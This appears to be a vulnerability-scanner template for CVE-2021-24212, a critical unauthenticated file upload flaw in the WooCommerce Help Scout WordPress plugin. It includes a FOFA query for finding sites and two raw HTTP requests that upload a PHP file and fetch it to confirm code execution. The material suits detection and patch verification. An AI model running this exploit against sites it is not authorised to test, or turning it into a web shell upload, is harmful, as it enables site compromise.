id: CVE-2021-24212

info:
  name: WooCommerce Help Scout - Arbitrary File Upload
  author: ritikchaddha
  severity: critical
  description: |
    WooCommerce Help Scout plugin before version 2.9.1 contains an unrestricted file upload vulnerability. The vulnerability allows unauthenticated users to upload arbitrary files to the server which by default will end up in wp-content/uploads/hstmp/ directory, potentially leading to remote code execution.
  impact: |
    Unauthenticated attackers can upload malicious files, potentially leading to remote code execution or site compromise.
  remediation: |
    Update to version 2.9.1 or later.
  reference:
    - https://wpscan.com/vulnerability/cf9305e8-f5bc-45c3-82db-0ef00fd46129/
    - https://sploitus.com/exploit?id=WPEX-ID:CF9305E8-F5BC-45C3-82DB-0EF00FD46129
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24212
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-24212
    cwe-id: CWE-434
    epss-score: 0.74459
    epss-percentile: 0.98867
  metadata:
    verified: false
    max-request: 2
    vendor: woocommerce
    product: help_scout
    fofa-query: body="/wp-content/plugins/woocommerce-help-scout"
  tags: cve,cve2021,wp,wordpress,wp-plugin,file-upload,rce,woocommerce-help-scout,vkev

variables:
  num: "999999999"
  filename: "{{rand_base(6)}}.php"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=wc_help_scout_upload_attachments HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=------------------------NCpI6tN3BZW3fz1Y9t2bkf

        ------------------------NCpI6tN3BZW3fz1Y9t2bkf
        Content-Disposition: form-data; name="file"; filename="{{filename}}"
        Content-Type: application/x-php

        <?php echo md5('{{num}}'); ?>
        ------------------------NCpI6tN3BZW3fz1Y9t2bkf--

      - |
        GET /wp-content/uploads/hstmp/{{filename}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{md5(num)}}"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022062dfe60572a43a599aadb72006f85a9356aaacbdc1602be20d16e0e4e96a2b7b022100990351fe788a3695f4043c7e00768f18d164716de1176c250024715d60e6f60f:922c64590222798bb761d5b6d8e72950